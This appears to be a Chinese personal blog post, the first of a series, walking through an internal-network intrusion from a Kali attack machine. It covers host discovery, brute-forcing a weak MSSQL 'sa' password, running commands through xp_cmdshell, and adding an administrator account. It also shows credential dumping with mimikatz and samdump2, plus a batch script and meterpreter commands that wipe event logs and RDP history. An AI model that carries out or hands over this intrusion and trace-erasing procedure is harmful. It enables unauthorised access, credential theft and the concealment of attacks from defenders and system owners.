内网渗透(一)

Posted by Tattoo on 2020-11-15
Estimated Reading Time 2 Minutes
Words 595 In Total
Viewed Times

环境

预设环境:攻击机Kali已通过代理进入内网

探测活动主机

  1. 使用netdiscover或nmap扫描主机

Kali自带的netdiscover是专用的二层发现工具,拥有主动和被动发现两种方式。

-i 指定网卡

-r 指定扫描范围

  1. 探测主机开放的端口和服务

攻击服务

  1. mssql口令爆破

使用msfconsole的mssql_login模块爆破弱口令

爆破出弱口令 sa:admin

  1. 执行cmd命令

有了口令,可以在数据库中利用xp_cmdshell进行命令执行

  1. 命令执行成功,接下来是getshell和提权

创建用户tattoo并加入管理员组

chcp 65001改变字符集,解决命令行输出乱码

获取控制权

  1. RPC远程连接

Kali自带远程连接工具rdesktop

使用刚添加的用户登录

1
rdesktop 192.168.3.30

至此,服务器shell拿下

  1. 获取用户口令

拿下shell之后,就可以读取内存中的用户口令,读取最高权限的口令

方法一:Mimikatz

使用共享目录将Mimikatz.exe传到目标机,共享文件夹权限为完全控制

使用管理员权限打开mimikatz.exe

以下两条命令可以获取本机口令

1
2
privilege::debug
sekurlsa::logonPasswords full

即可获取到内存中的登录口令

方法二:samdump2

保存注册表的hklm\sam,hklm\system

通过samdump2获取口令的hash值,解密即可

清除痕迹

  1. 删除操作日志

win+R,输入 eventvwr 进入事件查看器,右边栏选择清除日志。

  1. 清除远程桌面连接记录

代码保存为clear.bat文件,双击运行。

1
2
3
4
5
6
7
@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
  1. 新用户桌面可能没有回收站,使用命令打开回收站,或者shift+del永久删除
1
explorer.exe ::{645FF040-5081-101B-9F08-00AA002F954E}
  1. 删除刚创建的用户和共享文件夹

  1. 注销并关闭远程桌面

不能直接关机,否则目标机会关机

  1. Metasploit痕迹清除
1
2
3
4
5
//查看事件日志
meterpreter > run event_manager -i

//清除事件日志(包括六种类型)
meterpreter > run event_manager -c

至此,一次较完整的内网渗透告一段落,成功拿下文件服务器权限,接下来是拿下域控

未完待续……


If you like this blog or find it useful for you, you are welcome to comment on it. You are also welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them. Thank you !